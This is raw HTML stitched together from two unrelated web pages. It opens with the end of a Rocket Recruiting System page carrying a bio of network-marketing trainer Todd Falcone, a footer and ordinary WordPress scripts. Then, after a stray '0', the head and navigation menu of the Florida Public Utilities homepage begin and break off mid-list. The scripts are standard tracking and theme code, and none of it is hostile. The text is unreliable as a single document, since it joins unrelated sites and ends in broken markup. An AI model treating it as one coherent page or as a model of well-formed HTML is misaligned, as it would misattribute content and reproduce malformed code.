style="height:100%;width:100%">&nbsp;</div></div></div> </div> </div> </div></div><div class="vc_col-sm-6 wpb_column animate_afb"><div class="vc_column-inner"><div class="wpb_text_column "><div class="wpb_wrapper"><p>Todd Falcone is a network marketing trainer with over 25 years of entrepreneurial experience in the profession of network marketing and direct selling.</p> <p>Over the past decade, he has dedicated a majority of his time speaking, teaching and training on the subject of network marketing success.</p> <p>He regularly conducts conference calls, webinars and live training events in front of tens of thousands of people in the United States, Canada, Europe, Asia and other countries throughout the world.</p> <p>He consults network marketing company owners, coaches and trains top-level distributors, and invests a tremendous amount of time teaching new individuals about the fundamentals of success in network marketing.</p> <p>He is the President of Reach4Success, LLC and is the author of numerous articles and training programs, including Insider Secrets to Recruiting Professionals, How to Win in the Game of Prospecting, The Little Black Book of Scripts, and Cracking the Code to Success in Network Marketing, just to name a few.</p></div> </div> </div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#ff0000" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="4.12" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div> </main> </div> </div> </div> <!-- /CANVAS --> <!-- FOOTER --> <footer class="l-footer layout_compact" itemscope="itemscope" itemtype="https://schema.org/WPFooter"> <!-- subfooter: bottom --> <div class="l-subfooter at_bottom"> <div class="l-subfooter-h i-cf"> <div class="w-menu "><div class="w-menu-list"><a class="w-menu-item menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-8 current_page_item" href="http://rocketrecruitingapp.com/" id="menu-item-5156"><span>HOME</span></a><a class="w-menu-item menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home" href="http://rocketrecruitingapp.com/#services" id="menu-item-5157"><span>SERVICES</span></a><a class="w-menu-item menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home" href="http://rocketrecruitingapp.com/#features" id="menu-item-5158"><span>FEATURES</span></a><a class="w-menu-item menu-item menu-item-type-post_type menu-item-object-page" href="http://rocketrecruitingapp.com/affiliates/" id="menu-item-5374"><span>AFFILIATES</span></a><a class="w-menu-item menu-item menu-item-type-post_type menu-item-object-page" href="http://rocketrecruitingapp.com/terms-and-conditions/" id="menu-item-5400"><span>TERMS &#038; CONDITIONS</span></a></div></div> <div class="w-copyright">Rocket Recruiting System © 2018 All rights reserved. </div> </div> </div> </footer> <!-- /FOOTER --> <a class="w-header-show" href="javascript:void(0);"></a> <a class="w-toplink" href="#" title="Back to top"></a> <script type="text/javascript"> if (window.$us === undefined) window.$us = {}; $us.canvasOptions = ($us.canvasOptions || {}); $us.canvasOptions.disableEffectsWidth = 1024; $us.canvasOptions.responsive = true; $us.langOptions = ($us.langOptions || {}); $us.langOptions.magnificPopup = ($us.langOptions.magnificPopup || {}); $us.langOptions.magnificPopup.tPrev = 'Previous (Left arrow key)'; // Alt text on left arrow $us.langOptions.magnificPopup.tNext = 'Next (Right arrow key)'; // Alt text on right arrow $us.langOptions.magnificPopup.tCounter = '%curr% of %total%'; // Markup for "1 of 7" counter $us.navOptions = ($us.navOptions || {}); $us.navOptions.mobileWidth = 1111; $us.navOptions.togglable = true; </script> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MDVJC3G" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --><script type="text/javascript">$us.headerSettings = {"default":{"options":{"orientation":"hor","sticky":true,"scroll_breakpoint":100,"transparent":"0","width":300,"elm_align":"center","top_show":1,"top_height":"36","top_sticky_height":0,"top_fullwidth":0,"middle_height":"120","middle_sticky_height":"60","middle_fullwidth":0,"bg_img":"","bg_img_wrapper_start":"","bg_img_size":"cover","bg_img_repeat":"repeat","bg_img_attachment":"scroll","bg_img_position":"top center","bgimage_wrapper_end":"","bottom_show":0,"bottom_height":"36","bottom_sticky_height":40,"bottom_fullwidth":0},"layout":{"top_left":["text:3"],"top_center":[],"top_right":["socials:1"],"middle_left":["image:1"],"middle_center":[],"middle_right":["menu:1","cart:1"],"bottom_left":[],"bottom_center":[],"bottom_right":[],"hidden":["text:1","text:2","text:4","search:1","dropdown:1"]}},"tablets":{"options":{"orientation":"hor","sticky":true,"scroll_breakpoint":100,"transparent":0,"width":300,"elm_align":"center","top_show":1,"top_height":36,"top_sticky_height":0,"top_fullwidth":0,"middle_height":80,"middle_sticky_height":60,"middle_fullwidth":0,"bg_img":"","bg_img_wrapper_start":"","bg_img_size":"cover","bg_img_repeat":"repeat","bg_img_attachment":"scroll","bg_img_position":"top center","bgimage_wrapper_end":"","bottom_show":0,"bottom_height":50,"bottom_sticky_height":50,"bottom_fullwidth":0},"layout":{"top_left":["text:3"],"top_center":[],"top_right":["socials:1"],"middle_left":["image:1"],"middle_center":[],"middle_right":["menu:1","cart:1"],"bottom_left":[],"bottom_center":[],"bottom_right":[],"hidden":["dropdown:1","text:1","text:2","text:4","search:1"]}},"mobiles":{"options":{"orientation":"hor","sticky":true,"scroll_breakpoint":50,"transparent":0,"width":300,"elm_align":"center","top_show":0,"top_height":36,"top_sticky_height":0,"top_fullwidth":0,"middle_height":50,"middle_sticky_height":50,"middle_fullwidth":0,"bg_img":"","bg_img_wrapper_start":"","bg_img_size":"cover","bg_img_repeat":"repeat","bg_img_attachment":"scroll","bg_img_position":"top center","bgimage_wrapper_end":"","bottom_show":0,"bottom_height":50,"bottom_sticky_height":50,"bottom_fullwidth":0},"layout":{"top_left":["text:3"],"top_center":[],"top_right":["socials:1"],"middle_left":["image:1"],"middle_center":[],"middle_right":["menu:1","cart:1"],"bottom_left":[],"bottom_center":[],"bottom_right":[],"hidden":["text:1","text:2","text:4","search:1","dropdown:1"]}}};</script> <script type='text/javascript' src='https://app.clickfunnels.com/assets/cfpop.js?ver=1.0.0'></script> <script type='text/javascript' src='//rocketrecruitingapp.com/wp-content/themes/Impreza/framework/js/jquery.easing.min.js?ver=5f1e367b96afe88652670116fef58864'></script> <script type='text/javascript' src='//rocketrecruitingapp.com/wp-content/themes/Impreza/framework/js/jquery.magnific-popup.js?ver=1.1.0'></script> <script type='text/javascript' src='//rocketrecruitingapp.com/wp-content/themes/Impreza/framework/js/jquery.simpleplaceholder.js?ver=5f1e367b96afe88652670116fef58864'></script> <script type='text/javascript' src='//rocketrecruitingapp.com/wp-content/themes/Impreza/framework/js/imagesloaded.js?ver=5f1e367b96afe88652670116fef58864'></script> <script type='text/javascript' src='//rocketrecruitingapp.com/wp-content/themes/Impreza/framework/js/us.core.js?ver=3.2.1'></script> <script type='text/javascript' src='//rocketrecruitingapp.com/wp-content/themes/Impreza/framework/js/us.widgets.js?ver=3.2.1'></script> <script type='text/javascript' src='//rocketrecruitingapp.com/wp-content/themes/Impreza/js/us.theme.js?ver=3.2.1'></script> <script type='text/javascript' src='http://rocketrecruitingapp.com/wp-includes/js/comment-reply.min.js?ver=5f1e367b96afe88652670116fef58864'></script> <script type='text/javascript' src='http://rocketrecruitingapp.com/wp-includes/js/wp-embed.min.js?ver=5f1e367b96afe88652670116fef58864'></script> <script type='text/javascript' src='//rocketrecruitingapp.com/wp-content/themes/Impreza/framework/js/owl.carousel.min.js?ver=2.0.0'></script> </body> </html>
0
<!DOCTYPE html> <!--[if IE 6]> <html id="ie6" lang="en-US"> <![endif]--> <!--[if IE 7]> <html id="ie7" lang="en-US"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!--> <html lang="en-US"> <!--<![endif]--> <head> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-NBZMQ2T');</script> <!-- End Google Tag Manager --> <meta charset="UTF-8" /> <meta name="viewport" content="width=1000px"/> <script src="https://www.google.com/recaptcha/api.js" async defer></script> <title>Florida Public Utilities -Natural Gas, Electricity, Propane | Energy for Life</title> <script src="https://code.jquery.com/jquery-3.2.1.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script> <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script> <link type="text/css" rel="stylesheet" href="https://fast.fonts.net/cssapi/7d018f9b-41d7-4340-a3ba-874e7b0e4c89.css"/> <link rel="stylesheet" type="text/css" media="all" href="https://fpuc.com/wp-content/themes/FPU/style.css" /> <!--[if lt IE 9]> <script src="https://fpuc.com/wp-content/themes/FPU/js/html5.js" type="text/javascript"></script> <![endif]--> <!-- This site is optimized with the Yoast SEO plugin v11.2 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Florida Public Utilities (FPU) provides natural gas, electricity and propane service to residential, commercial and industrial markets throughout Florida."/> <link rel="canonical" href="https://fpuc.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Florida Public Utilities -Natural Gas, Electricity, Propane" /> <meta property="og:description" content="Florida Public Utilities (FPU) provides natural gas, electricity and propane service to residential, commercial and industrial markets throughout Florida." /> <meta property="og:url" content="https://fpuc.com/" /> <meta property="og:site_name" content="Florida Public Utilities" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://fpuc.com/#organization","name":"","url":"https://fpuc.com/","sameAs":[]},{"@type":"WebSite","@id":"https://fpuc.com/#website","url":"https://fpuc.com/","name":"Florida Public Utilities","publisher":{"@id":"https://fpuc.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://fpuc.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://fpuc.com/#webpage","url":"https://fpuc.com/","inLanguage":"en-US","name":"Florida Public Utilities -Natural Gas, Electricity, Propane","isPartOf":{"@id":"https://fpuc.com/#website"},"about":{"@id":"https://fpuc.com/#organization"},"datePublished":"2012-04-26T21:10:17+00:00","dateModified":"2019-04-08T15:31:34+00:00","description":"Florida Public Utilities (FPU) provides natural gas, electricity and propane service to residential, commercial and industrial markets throughout Florida."}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Florida Public Utilities &raquo; FPUHome Comments Feed" href="https://fpuc.com/fpu-home/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/fpuc.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=10bba9c227fd74fa75702352b3de483d"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='layerslider-css' href='https://fpuc.com/wp-content/plugins/LayerSlider/static/layerslider/css/layerslider.css?ver=6.8.2' type='text/css' media='all' /> <link rel='stylesheet' id='ls-user-css' href='https://fpuc.com/wp-content/uploads/layerslider.custom.css?ver=6.8.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-pagenavi-css' href='https://fpuc.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' /> <link rel='stylesheet' id='ubermenu-css' href='https://fpuc.com/wp-content/plugins/ubermenu/pro/assets/css/ubermenu.min.css?ver=3.2.5' type='text/css' media='all' /> <link rel='stylesheet' id='ubermenu-grey-white-css' href='https://fpuc.com/wp-content/plugins/ubermenu/assets/css/skins/blackwhite.css?ver=10bba9c227fd74fa75702352b3de483d' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var LS_Meta = {"v":"6.8.2"}; /* ]]> */ </script> <script type='text/javascript' src='https://fpuc.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0'></script> <script type='text/javascript' src='https://fpuc.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://fpuc.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://fpuc.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedia.jquery.js?ver=6.8.2'></script> <script type='text/javascript' src='https://fpuc.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.transitions.js?ver=6.8.2'></script> <meta name="generator" content="Powered by LayerSlider 6.8.2 - Multi-Purpose, Responsive, Parallax, Mobile-Friendly Slider Plugin for WordPress." /> <!-- LayerSlider updates and docs at: https://layerslider.kreaturamedia.com --> <link rel='https://api.w.org/' href='https://fpuc.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://fpuc.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://fpuc.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://fpuc.com/' /> <link rel="alternate" type="application/json+oembed" href="https://fpuc.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ffpuc.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://fpuc.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ffpuc.com%2F&#038;format=xml" /> <style id="ubermenu-custom-generated-css"> /** UberMenu Custom Menu Styles (Customizer) **/ /* main */ .ubermenu-main .ubermenu-item .ubermenu-submenu-drop { -webkit-transition-duration:300ms; -ms-transition-duration:300ms; transition-duration:300ms; } .ubermenu-main .ubermenu-item-layout-image_left > .ubermenu-target-text { padding-left:26px; } .ubermenu-main .ubermenu-item-layout-image_right > .ubermenu-target-text { padding-right:26px; } /* Status: Loaded from Transient */ </style> <meta name="google-site-verification" content="DBrpXHnuvgZ3-bwoAZlRfSJEFUVKufNeC-lrQiWXDeU" /> <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.1/css/all.css" integrity="sha384-50oBUHEmvpQ+1lW4y57PTFmhCaXp0ML5d60M1M7uH2+nqUivzIebhndOJK28anvf" crossorigin="anonymous"> </head> <body class="home page-template page-template-Home_Fuels2015 page-template-Home_Fuels2015-php page page-id-54 class-name"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-NBZMQ2T" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div class="wrapper juneTest" id="FPUHomecorp"> <div class="siteAlert"> </div> <div class="skipnav"><a href="#maincontent">Skip to main content</a></div> <div class="corpHead"> <div class="corpNav"> <nav class="FuelMenu" aria-label="Site menu"> <!-- UberMenu [Configuration:main] [Theme Loc:site-main] [Integration:auto] --> <div id="ubermenu-main-40-site-main" class="ubermenu ubermenu-nojs ubermenu-main ubermenu-menu-40 ubermenu-loc-site-main ubermenu-responsive-collapse ubermenu-horizontal ubermenu-transition-slide ubermenu-trigger-hover_intent ubermenu-skin-grey-white ubermenu-bar-align-full ubermenu-items-align-left ubermenu-sub-indicators ubermenu-retractors-responsive"><ul id="ubermenu-nav-main-40-site-main" class="ubermenu-nav"><li id="menu-item-5187" class="ng ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5187 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Natural Gas</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5187 ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-full_width ubermenu-autoclear" ><li id="menu-item-6387" class="formLink ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-6387 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-5 ubermenu-clear-row ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/natural-gas-new-service-inquiry/"><span class="ubermenu-target-title ubermenu-target-text">Interested in Natural Gas?</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-6387 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5201" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5201 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/residential/"><span class="ubermenu-target-title ubermenu-target-text">Residential Natural Gas</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5201 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5203" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5203 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/residential/benefits/"><span class="ubermenu-target-title ubermenu-target-text">Benefits</span></a></li><li id="menu-item-5258" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5258 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/residential/natural-gas-appliances/"><span class="ubermenu-target-title ubermenu-target-text">Natural Gas Appliances</span></a></li><li id="menu-item-5245" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5245 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/faq/"><span class="ubermenu-target-title ubermenu-target-text">Natural Gas FAQ</span></a></li><li id="menu-item-5266" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5266 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/residential/appliance-services-and-repairs/"><span class="ubermenu-target-title ubermenu-target-text">Appliance Services and Repairs</span></a></li></ul></li><li id="menu-item-5262" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5262 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" title="Residential" href="https://fpuc.com/naturalgas/rates-tariffs/"><span class="ubermenu-target-title ubermenu-target-text">Rates &#038; Tariffs</span></a></li></ul></li><li id="menu-item-5206" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5206 ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-5 ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/commercial/"><span class="ubermenu-target-title ubermenu-target-text">Natural Gas for Business</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5206 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5269" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5269 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/rebates-conservation/commercial-rebates/"><span class="ubermenu-target-title ubermenu-target-text">Natural Gas Rebates for Business</span></a></li><li id="menu-item-5202" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5202 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/commercial/benefits/"><span class="ubermenu-target-title ubermenu-target-text">Benefits</span></a></li><li id="menu-item-5260" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5260 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/commercial/appliances/"><span class="ubermenu-target-title ubermenu-target-text">Commercial Appliances</span></a></li><li id="menu-item-7243" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-7243 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/commercial/questline-newsletter/"><span class="ubermenu-target-title ubermenu-target-text">Questline Newsletter</span></a></li><li id="menu-item-5210" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5210 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/builders/"><span class="ubermenu-target-title ubermenu-target-text">For Builders</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5210 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-8560" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-8560 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/builders/multi-family-incentive-program/"><span class="ubermenu-target-title ubermenu-target-text">Multi-Family Incentive Program</span></a></li><li id="menu-item-5270" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5270 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/builders/green-building/"><span class="ubermenu-target-title ubermenu-target-text">Green Building</span></a></li><li id="menu-item-5272" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5272 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/builders/energystar/"><span class="ubermenu-target-title ubermenu-target-text">ENERGY STAR®</span></a></li></ul></li><li id="menu-item-6008" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-6008 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/transportation-services/"><span class="ubermenu-target-title ubermenu-target-text">Provider Choice Program</span></a></li><li id="menu-item-5248" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5248 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/programs-services/"><span class="ubermenu-target-title ubermenu-target-text">Natural Gas Programs</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5248 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5247" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5247 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/programs-services/share-the-love-refer-a-friend/"><span class="ubermenu-target-title ubermenu-target-text">Share the Love (Refer a Neighbor)</span></a></li><li id="menu-item-8561" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-8561 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/builders/multi-family-incentive-program/"><span class="ubermenu-target-title ubermenu-target-text">Multi-Family Incentive Program</span></a></li></ul></li></ul></li><li id="menu-item-5237" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5237 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-5 ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/safety/"><span class="ubermenu-target-title ubermenu-target-text">Safety</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5237 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5236" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5236 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/safety/safety-basics/"><span class="ubermenu-target-title ubermenu-target-text">Safety Basics</span></a></li><li id="menu-item-5235" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5235 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/safety/storm-safety/"><span class="ubermenu-target-title ubermenu-target-text">Storm Safety</span></a></li><li id="menu-item-5238" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5238 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/safety/811-before-you-dig/"><span class="ubermenu-target-title ubermenu-target-text">811 Before You Dig</span></a></li><li id="menu-item-8272" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page 